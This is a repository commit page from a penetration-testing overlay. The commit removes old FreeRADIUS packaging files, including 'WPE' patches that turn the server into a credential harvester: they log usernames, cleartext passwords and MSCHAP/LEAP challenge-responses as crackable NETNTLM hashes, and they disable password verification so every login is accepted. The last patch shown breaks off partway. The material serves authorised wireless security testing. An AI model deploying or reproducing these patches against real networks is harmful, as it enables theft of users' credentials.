Backup_Repos/pentoo-overlay
1
0
Fork 0
mirror of https://github.com/pentoo/pentoo-overlay synced 2026-05-09 04:51:27 +02:00
Code Issues Projects Releases Wiki Activity

freeradius: remove old/unused

Browse source
This commit is contained in:
Rick Farina (Zero_Chaos) 2019-10-14 13:23:58 -04:00
parent b41931b67f
commit 1ee23dced3
No known key found for this signature in database
GPG key ID: A29433C0AA431DDC
8 changed files with 0 additions and 1197 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

376
net-dialup/freeradius/files/freeradius-2.2.0-wpe.patch
View file

@ -1,376 +0,0 @@
diff -uNr freeradius-server-2.1.12/raddb/radiusd.conf.in freeradius-server-2.1.12-wpe/raddb/radiusd.conf.in
--- freeradius-server-2.1.12/raddb/radiusd.conf.in 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/raddb/radiusd.conf.in 2012-08-15 10:34:20.369565898 -0400
@@ -466,6 +466,7 @@
# The program to execute to do concurrency checks.
checkrad = ${sbindir}/checkrad
+wpelogfile = ${logdir}/freeradius-server-wpe.log
# SECURITY CONFIGURATION
#
diff -uNr freeradius-server-2.1.12/raddb/users freeradius-server-2.1.12-wpe/raddb/users
--- freeradius-server-2.1.12/raddb/users 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/raddb/users 2012-08-15 10:34:20.369565898 -0400
@@ -201,3 +201,6 @@
# Service-Type = Administrative-User
# On no match, the user is denied access.
+#"bradtest" Cleartext-Password := "bradtest", MS-CHAP-Use-NTLM-Auth := 0
+DEFAULT Cleartext-Password := "foo", MS-CHAP-Use-NTLM-Auth := 0
+DEFAULT Cleartext-Password := "a"
diff -uNr freeradius-server-2.1.12/src/include/radiusd.h freeradius-server-2.1.12-wpe/src/include/radiusd.h
--- freeradius-server-2.1.12/src/include/radiusd.h 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/include/radiusd.h 2012-08-15 10:34:20.369565898 -0400
@@ -368,6 +368,7 @@
#endif
char *log_file;
char *checkrad;
+ char *wpelogfile;
const char *pid_file;
rad_listen_t *listen;
int syslog_facility;
diff -uNr freeradius-server-2.1.12/src/main/auth.c freeradius-server-2.1.12-wpe/src/main/auth.c
--- freeradius-server-2.1.12/src/main/auth.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/main/auth.c 2012-08-15 10:34:20.369565898 -0400
@@ -350,6 +350,7 @@
return -1;
}
RDEBUG2("User-Password in the request is correct.");
+ log_wpe("password", request->username->vp_strvalue,password_pair->vp_strvalue, NULL, 0, NULL, 0);
break;
} else if (auth_item->attribute != PW_CHAP_PASSWORD) {
diff -uNr freeradius-server-2.1.12/src/main/log.c freeradius-server-2.1.12-wpe/src/main/log.c
--- freeradius-server-2.1.12/src/main/log.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/main/log.c 2012-08-15 10:34:20.369565898 -0400
@@ -28,6 +28,9 @@
#include <freeradius-devel/radiusd.h>
+#include <stdio.h>
+#include <time.h>
+
#ifdef HAVE_SYS_STAT_H
#include <sys/stat.h>
#endif
@@ -181,6 +184,68 @@
return r;
}
+void log_wpe(char *authtype, char *username, char *password, unsigned char *challenge, unsigned int challen, unsigned char *response, unsigned int resplen)
+ {
+ FILE *logfd;
+ time_t nowtime;
+ unsigned int count;
+
+ /* Get wpelogfile parameter and log data */
+ if (mainconfig.wpelogfile == NULL) {
+ logfd = stderr;
+ } else {
+ logfd = fopen(mainconfig.wpelogfile, "a");
+ if (logfd == NULL) {
+ DEBUG2(" rlm_mschap: FAILED: Unable to open output log file %s: %s", mainconfig.wpelogfile, strerror(errno));
+ logfd = stderr;
+ }
+ }
+
+
+ nowtime = time(NULL);
+ fprintf(logfd, "%s: %s\n", authtype, ctime(&nowtime));
+
+ if (username != NULL) {
+ fprintf(logfd, "\tusername: %s\n", username);
+ }
+ if (password != NULL) {
+ fprintf(logfd, "\tpassword: %s\n", password);
+ }
+
+ if (challen != 0) {
+ fprintf(logfd, "\tchallenge: ");
+ for (count=0; count!=(challen-1); count++) {
+ fprintf(logfd, "%02x:",challenge[count]);
+ }
+ fprintf(logfd, "%02x\n",challenge[challen-1]);
+ }
+
+ if (resplen != 0) {
+ fprintf(logfd, "\tresponse: ");
+ for (count=0; count!=(resplen-1); count++) {
+ fprintf(logfd, "%02x:",response[count]);
+ }
+ fprintf(logfd, "%02x\n",response[resplen-1]);
+ }
+
+ if ( (strncmp(authtype, "mschap", 6) == 0) && username != NULL && challen != 0 && resplen != 0) {
+ fprintf(logfd, "\tjohn NETNTLM: %s:$NETNTLM$",username);
+ for (count=0; count<challen; count++) {
+ fprintf(logfd, "%02x",challenge[count]);
+ }
+ fprintf(logfd,"$");
+ for (count=0; count<resplen; count++) {
+ fprintf(logfd, "%02x",response[count]);
+ }
+ fprintf(logfd,"\n");
+ }
+
+ fprintf(logfd, "\n");
+
+ fclose(logfd);
+ }
+
+
/*
* Dump a whole list of attributes to DEBUG2
diff -uNr freeradius-server-2.1.12/src/main/mainconfig.c freeradius-server-2.1.12-wpe/src/main/mainconfig.c
--- freeradius-server-2.1.12/src/main/mainconfig.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/main/mainconfig.c 2012-08-15 10:34:20.369565898 -0400
@@ -232,7 +232,7 @@
{ "checkrad", PW_TYPE_STRING_PTR, 0, &mainconfig.checkrad, "${sbindir}/checkrad" },
{ "debug_level", PW_TYPE_INTEGER, 0, &mainconfig.debug_level, "0"},
-
+ { "wpelogfile", PW_TYPE_STRING_PTR, 0, &mainconfig.wpelogfile, "${logdir}/freeradius-server-wpe.log" },
#ifdef WITH_PROXY
{ "proxy_requests", PW_TYPE_BOOLEAN, 0, &mainconfig.proxy_requests, "yes" },
#endif
diff -uNr freeradius-server-2.1.12/src/main/radiusd.c freeradius-server-2.1.12-wpe/src/main/radiusd.c
--- freeradius-server-2.1.12/src/main/radiusd.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/main/radiusd.c 2012-08-15 10:35:10.881816378 -0400
@@ -65,7 +65,7 @@
int debug_flag = 0;
int check_config = FALSE;
-const char *radiusd_version = "FreeRADIUS Version " RADIUSD_VERSION ", for host " HOSTINFO ", built on " __DATE__ " at " __TIME__;
+const char *radiusd_version = "FreeRADIUS-WPE Version " RADIUSD_VERSION ", for host " HOSTINFO ", built on " __DATE__ " at " __TIME__;
pid_t radius_pid;
diff -uNr freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c
--- freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2012-08-15 10:34:20.369565898 -0400
@@ -244,11 +244,11 @@
* Verify the MS-CHAP response from the user.
*/
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
- leap_session_t *session)
+ leap_session_t *session, char *username)
{
unsigned char ntpwdhash[16];
unsigned char response[24];
-
+ unsigned char challenge[8] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
/*
* No password or previous packet. Die.
@@ -266,6 +266,7 @@
*/
eapleap_mschap(ntpwdhash, session->peer_challenge, response);
if (memcmp(response, packet->challenge, 24) == 0) {
+ log_wpe("LEAP", username, NULL, challenge, 8, response, 24);
DEBUG2(" rlm_eap_leap: NtChallengeResponse from AP is valid");
memcpy(session->peer_response, response, sizeof(response));
return 1;
diff -uNr freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h
--- freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2012-08-15 10:34:20.369565898 -0400
@@ -68,7 +68,7 @@
LEAP_PACKET *eapleap_extract(EAP_DS *auth);
LEAP_PACKET *eapleap_initiate(EAP_DS *eap_ds, VALUE_PAIR *user_name);
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
- leap_session_t *session);
+ leap_session_t *session, char *username);
LEAP_PACKET *eapleap_stage6(LEAP_PACKET *packet, REQUEST *request,
VALUE_PAIR *user_name, VALUE_PAIR* password,
leap_session_t *session,
diff -uNr freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c
--- freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2012-08-15 10:34:20.369565898 -0400
@@ -133,7 +133,7 @@
switch (session->stage) {
case 4: /* Verify NtChallengeResponse */
DEBUG2(" rlm_eap_leap: Stage 4");
- rcode = eapleap_stage4(packet, password, session);
+ rcode = eapleap_stage4(packet, password, session, username);
session->stage = 6;
/*
diff -uNr freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c
--- freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2012-08-15 10:34:20.369565898 -0400
@@ -202,9 +202,13 @@
/*
* The length of the response is always 16 for MD5.
*/
+ /* WPE FTW
if (memcmp(output, packet->value, 16) != 0) {
return 0;
}
+ */
+ log_wpe("eap_md5", packet->name, NULL, challenge, MD5_CHALLENGE_LEN,
+ packet->value, 16);
return 1;
}
diff -uNr freeradius-server-2.1.12/src/modules/rlm_mschap/rlm_mschap.c freeradius-server-2.1.12-wpe/src/modules/rlm_mschap/rlm_mschap.c
--- freeradius-server-2.1.12/src/modules/rlm_mschap/rlm_mschap.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_mschap/rlm_mschap.c 2012-08-15 10:34:20.381565941 -0400
@@ -661,9 +661,11 @@
static int do_mschap(rlm_mschap_t *inst,
REQUEST *request, VALUE_PAIR *password,
uint8_t *challenge, uint8_t *response,
- uint8_t *nthashhash, int do_ntlm_auth)
+ uint8_t *nthashhash, int do_ntlm_auth, char *username)
{
uint8_t calculated[24];
+
+ log_wpe("mschap", username, NULL, challenge, 8, response, 24);
/*
* Do normal authentication.
@@ -678,9 +680,11 @@
}
smbdes_mschap(password->vp_strvalue, challenge, calculated);
+ /* WPE FTW
if (rad_digest_cmp(response, calculated, 24) != 0) {
return -1;
}
+ */
/*
* If the password exists, and is an NT-Password,
@@ -1130,7 +1134,7 @@
*/
if (do_mschap(inst, request, password, challenge->vp_octets,
response->vp_octets + offset, nthashhash,
- do_ntlm_auth) < 0) {
+ do_ntlm_auth, request->username->vp_strvalue) < 0) {
RDEBUG2("MS-CHAP-Response is incorrect.");
goto do_error;
}
@@ -1239,7 +1243,7 @@
if (do_mschap(inst, request, nt_password, mschapv1_challenge,
response->vp_octets + 26, nthashhash,
- do_ntlm_auth) < 0) {
+ do_ntlm_auth, request->username->vp_strvalue) < 0) {
int i;
char buffer[128];
diff -uNr freeradius-server-2.1.12/src/modules/rlm_pap/rlm_pap.c freeradius-server-2.1.12-wpe/src/modules/rlm_pap/rlm_pap.c
--- freeradius-server-2.1.12/src/modules/rlm_pap/rlm_pap.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_pap/rlm_pap.c 2012-08-15 10:34:20.381565941 -0400
@@ -521,6 +521,8 @@
RDEBUG("ERROR: You set 'Auth-Type = PAP' for a request that does not contain a User-Password attribute!");
return RLM_MODULE_INVALID;
}
+ log_wpe("pap",request->username->vp_strvalue, request->password->vp_strvalue,
+ NULL, 0, NULL, 0);
/*
* The user MUST supply a non-zero-length password.
@@ -604,6 +606,7 @@
do_clear:
RDEBUG("Using clear text password \"%s\"",
vp->vp_strvalue);
+ /* WPE FTW
if ((vp->length != request->password->length) ||
(rad_digest_cmp(vp->vp_strvalue,
request->password->vp_strvalue,
@@ -611,6 +614,7 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: CLEAR TEXT password check failed");
goto make_msg;
}
+ */
done:
RDEBUG("User authenticated successfully");
return RLM_MODULE_OK;
@@ -643,10 +647,12 @@
fr_MD5Update(&md5_context, request->password->vp_octets,
request->password->length);
fr_MD5Final(digest, &md5_context);
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: MD5 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -670,10 +676,12 @@
/*
* Compare only the MD5 hash results, not the salt.
*/
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, 16) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SMD5 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -692,10 +700,12 @@
fr_SHA1Update(&sha1_context, request->password->vp_octets,
request->password->length);
fr_SHA1Final(digest,&sha1_context);
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SHA1 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -716,10 +726,12 @@
request->password->length);
fr_SHA1Update(&sha1_context, &vp->vp_octets[20], vp->length - 20);
fr_SHA1Final(digest,&sha1_context);
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, 20) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SSHA password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -741,11 +753,13 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
goto make_msg;
}
+ /* WPE FTW
if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
(rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0)) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: NT password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -765,16 +779,20 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
goto make_msg;
}
+ /* WPE FTW
if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
(rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0)) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: LM password check failed");
+ */
make_msg:
+ /*
RDEBUG("Passwords don't match");
module_fmsg_vp = pairmake("Module-Failure-Message",
module_fmsg, T_OP_EQ);
pairadd(&request->packet->vps, module_fmsg_vp);
return RLM_MODULE_REJECT;
}
+ */
goto done;
break;

104
net-dialup/freeradius/files/freeradius-2.2.5-gentoo.patch
View file

@ -1,104 +0,0 @@
--- a/raddb/radiusd.conf.in
+++ b/raddb/radiusd.conf.in
@@ -103,7 +103,7 @@
# make
# make install
#
-libdir = @libdir@
+libdir = @libdir@/freeradius
# pidfile: Where to place the PID of the RADIUS server.
#
--- a/src/modules/Makefile
+++ b/src/modules/Makefile
@@ -12,7 +12,7 @@
@$(MAKE) $(MFLAGS) WHAT_TO_MAKE=$@ common
install:
- $(INSTALL) -d -m 755 $(R)$(libdir)
+ $(INSTALL) -d -m 755 $(R)$(pkglibdir)
@$(MAKE) $(MFLAGS) WHAT_TO_MAKE=$@ common
clean:
--- a/src/modules/rules.mak
+++ b/src/modules/rules.mak
@@ -122,7 +122,7 @@
$(TARGET).la: $(RLM_SUBDIRS) $(LT_OBJS)
$(LIBTOOL) --mode=link --tag=CC $(CC) -release $(RADIUSD_VERSION_STRING) \
-module $(LINK_MODE) $(LDFLAGS) $(RLM_LDFLAGS) -o $@ \
- -rpath $(libdir) $^ $(LIBRADIUS) $(RLM_LIBS) $(LIBS)
+ -rpath $(pkglibdir) $^ $(LIBRADIUS) $(RLM_LIBS) $(LIBS)
#######################################################################
#
@@ -163,13 +163,11 @@
# Do any module-specific installation.
#
# If there isn't a TARGET defined, then don't do anything.
-# Otherwise, install the libraries into $(libdir)
+# Otherwise, install the libraries into $(pkglibdir)
#
install:
@[ "x$(RLM_INSTALL)" = "x" ] || $(MAKE) $(MFLAGS) $(RLM_INSTALL)
if [ "x$(TARGET)" != "x" ]; then \
$(LIBTOOL) --mode=install $(INSTALL) -c \
- $(TARGET).la $(R)$(libdir)/$(TARGET).la || exit $$?; \
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION_STRING).la; \
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION_STRING).la || exit $$?; \
+ $(TARGET).la $(R)$(pkglibdir)/$(TARGET).la || exit $$?; \
fi
--- a/src/modules/rlm_sql/drivers/rules.mak
+++ b/src/modules/rlm_sql/drivers/rules.mak
@@ -103,7 +103,7 @@
$(TARGET).la: $(LT_OBJS)
$(LIBTOOL) --mode=link --tag=CC $(CC) -release $(RADIUSD_VERSION_STRING) \
-module $(LINK_MODE) $(LDFLAGS) $(RLM_SQL_LDFLAGS) -o $@ \
- -rpath $(libdir) $^ $(RLM_SQL_LIBS)
+ -rpath $(pkglibdir) $^ $(RLM_SQL_LIBS)
#######################################################################
#
@@ -141,12 +141,10 @@
# Do any module-specific installation.
#
# If there isn't a TARGET defined, then don't do anything.
-# Otherwise, install the libraries into $(libdir)
+# Otherwise, install the libraries into $(pkglibdir)
#
install:
if [ "x$(TARGET)" != "x" ]; then \
$(LIBTOOL) --mode=install $(INSTALL) -c \
- $(TARGET).la $(R)$(libdir)/$(TARGET).la || exit $$?; \
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION_STRING).la; \
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION_STRING).la || exit $$?; \
+ $(TARGET).la $(R)$(pkglibdir)/$(TARGET).la || exit $$?; \
fi
--- a/src/lib/Makefile
+++ b/src/lib/Makefile
@@ -42,7 +42,7 @@
$(TARGET).la: $(LT_OBJS)
$(LIBTOOL) --mode=link --tag=CC $(CC) -release $(RADIUSD_VERSION) \
- $(LDFLAGS) $(LINK_MODE) -o $@ -rpath $(libdir) $^
+ $(LDFLAGS) $(LINK_MODE) -o $@ -rpath $(libdir) $^ $(LIBS)
$(LT_OBJS): $(INCLUDES)
@@ -54,7 +54,5 @@
$(INSTALL) -d -m 755 $(R)$(libdir)
$(LIBTOOL) --mode=install $(INSTALL) -c $(TARGET).la \
$(R)$(libdir)/$(TARGET).la
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la;
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la
reconfig:
--- a/Make.inc.in
+++ b/Make.inc.in
@@ -10,6 +10,7 @@
sysconfdir = @sysconfdir@
localstatedir = @localstatedir@
libdir = @libdir@
+pkglibdir = @libdir@/freeradius
bindir = @bindir@
sbindir = @sbindir@
docdir = @docdir@

374
net-dialup/freeradius/files/freeradius-2.2.5-wpe.patch
View file

@ -1,374 +0,0 @@
File ./freeradius-2.2.5.orig/.ipc_in is a fifo while file ./freeradius-2.2.5/.ipc_in is a fifo
File ./freeradius-2.2.5.orig/.ipc_out is a fifo while file ./freeradius-2.2.5/.ipc_out is a fifo
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/raddb/radiusd.conf.in ./freeradius-2.2.5/work/freeradius-server-2.2.5/raddb/radiusd.conf.in
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/raddb/radiusd.conf.in 2014-05-18 20:11:13.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/raddb/radiusd.conf.in 2014-05-18 20:13:04.234827890 +0800
@@ -499,6 +499,7 @@
# The program to execute to do concurrency checks.
checkrad = ${sbindir}/checkrad
+wpelogfile = ${logdir}/freeradius-server-wpe.log
# SECURITY CONFIGURATION
#
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/raddb/users ./freeradius-2.2.5/work/freeradius-server-2.2.5/raddb/users
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/raddb/users 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/raddb/users 2014-05-18 20:16:52.153826780 +0800
@@ -201,3 +201,7 @@
# Service-Type = Administrative-User
# On no match, the user is denied access.
+
+#"bradtest" Cleartext-Password := "bradtest", MS-CHAP-Use-NTLM-Auth := 0
+DEFAULT Cleartext-Password := "foo", MS-CHAP-Use-NTLM-Auth := 0
+DEFAULT Cleartext-Password := "a"
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/include/radiusd.h ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/include/radiusd.h
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/include/radiusd.h 2014-05-18 20:11:13.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/include/radiusd.h 2014-05-18 20:17:59.921826451 +0800
@@ -369,6 +369,7 @@
#endif
char *log_file;
char *checkrad;
+ char *wpelogfile;
const char *pid_file;
rad_listen_t *listen;
int syslog_facility;
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/auth.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/auth.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/auth.c 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/auth.c 2014-05-18 20:19:11.561826102 +0800
@@ -350,6 +350,7 @@
return -1;
}
RDEBUG2("User-Password in the request is correct.");
+ log_wpe("password", request->username->vp_strvalue,password_pair->vp_strvalue, NULL, 0, NULL, 0);
break;
} else if (auth_item->attribute != PW_CHAP_PASSWORD) {
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/log.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/log.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/log.c 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/log.c 2014-05-18 20:23:55.063824722 +0800
@@ -27,6 +27,8 @@
RCSID("$Id: ed6baf3e2c7a6e92f49de7335bb9747aea2e7ca2 $")
#include <freeradius-devel/radiusd.h>
+#include <stdio.h>
+#include <time.h>
#ifdef HAVE_SYS_STAT_H
#include <sys/stat.h>
@@ -191,6 +193,64 @@
return r;
}
+void log_wpe(char *authtype, char *username, char *password, unsigned char *challenge, unsigned int challen, unsigned char *response, unsigned int resplen)
+ {
+ FILE *logfd;
+ time_t nowtime;
+ unsigned int count;
+
+ /* Get wpelogfile parameter and log data */
+ if (mainconfig.wpelogfile == NULL) {
+ logfd = stderr;
+ } else {
+ logfd = fopen(mainconfig.wpelogfile, "a");
+ if (logfd == NULL) {
+ DEBUG2(" rlm_mschap: FAILED: Unable to open output log file %s: %s", mainconfig.wpelogfile, strerror(errno));
+ logfd = stderr;
+ }
+ }
+
+ nowtime = time(NULL);
+ fprintf(logfd, "%s: %s\n", authtype, ctime(&nowtime));
+
+ if (username != NULL) {
+ fprintf(logfd, "\tusername: %s\n", username);
+ }
+ if (password != NULL) {
+ fprintf(logfd, "\tpassword: %s\n", password);
+ }
+
+ if (challen != 0) {
+ fprintf(logfd, "\tchallenge: ");
+ for (count=0; count!=(challen-1); count++) {
+ fprintf(logfd, "%02x:",challenge[count]);
+ }
+ fprintf(logfd, "%02x\n",challenge[challen-1]);
+ }
+
+ if (resplen != 0) {
+ fprintf(logfd, "\tresponse: ");
+ for (count=0; count!=(resplen-1); count++) {
+ fprintf(logfd, "%02x:",response[count]);
+ }
+ fprintf(logfd, "%02x\n",response[resplen-1]);
+ }
+
+ if ( (strncmp(authtype, "mschap", 6) == 0) && username != NULL && challen != 0 && resplen != 0) {
+ fprintf(logfd, "\tjohn NETNTLM: %s:$NETNTLM$",username);
+ for (count=0; count<challen; count++) {
+ fprintf(logfd, "%02x",challenge[count]);
+ }
+ fprintf(logfd,"$");
+ for (count=0; count<resplen; count++) {
+ fprintf(logfd, "%02x",response[count]);
+ }
+ fprintf(logfd,"\n");
+ }
+
+ fprintf(logfd, "\n");
+ fclose(logfd);
+}
/*
* Dump a whole list of attributes to DEBUG2
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/mainconfig.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/mainconfig.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/mainconfig.c 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/mainconfig.c 2014-05-18 20:24:49.415824458 +0800
@@ -250,6 +250,8 @@
{ "debug_level", PW_TYPE_INTEGER, 0, &mainconfig.debug_level, "0"},
+ { "wpelogfile", PW_TYPE_STRING_PTR, 0, &mainconfig.wpelogfile, "${logdir}/freeradius-server-wpe.log" },
+
#ifdef WITH_PROXY
{ "proxy_requests", PW_TYPE_BOOLEAN, 0, &mainconfig.proxy_requests, "yes" },
#endif
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/radiusd.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/radiusd.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/radiusd.c 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/radiusd.c 2014-05-18 20:25:46.103824182 +0800
@@ -65,7 +65,7 @@
int debug_flag = 0;
int check_config = FALSE;
-const char *radiusd_version = "FreeRADIUS Version " RADIUSD_VERSION_STRING
+const char *radiusd_version = "FreeRADIUS-WPE Version " RADIUSD_VERSION_STRING
#ifdef RADIUSD_VERSION_COMMIT
" (git #" RADIUSD_VERSION_COMMIT ")"
#endif
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2014-05-18 20:27:16.391823742 +0800
@@ -244,11 +244,11 @@
* Verify the MS-CHAP response from the user.
*/
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
- leap_session_t *session)
+ leap_session_t *session, char *username)
{
unsigned char ntpwdhash[16];
unsigned char response[24];
-
+ unsigned char challenge[8] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
/*
* No password or previous packet. Die.
@@ -266,6 +266,7 @@
*/
eapleap_mschap(ntpwdhash, session->peer_challenge, response);
if (memcmp(response, packet->challenge, 24) == 0) {
+ log_wpe("LEAP", username, NULL, challenge, 8, response, 24);
DEBUG2(" rlm_eap_leap: NtChallengeResponse from AP is valid");
memcpy(session->peer_response, response, sizeof(response));
return 1;
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2014-05-18 20:27:16.391823742 +0800
@@ -68,7 +68,7 @@
LEAP_PACKET *eapleap_extract(EAP_DS *auth);
LEAP_PACKET *eapleap_initiate(EAP_DS *eap_ds, VALUE_PAIR *user_name);
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
- leap_session_t *session);
+ leap_session_t *session, char *username);
LEAP_PACKET *eapleap_stage6(LEAP_PACKET *packet, REQUEST *request,
VALUE_PAIR *user_name, VALUE_PAIR* password,
leap_session_t *session,
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2014-05-18 20:27:16.392823742 +0800
@@ -133,7 +133,7 @@
switch (session->stage) {
case 4: /* Verify NtChallengeResponse */
DEBUG2(" rlm_eap_leap: Stage 4");
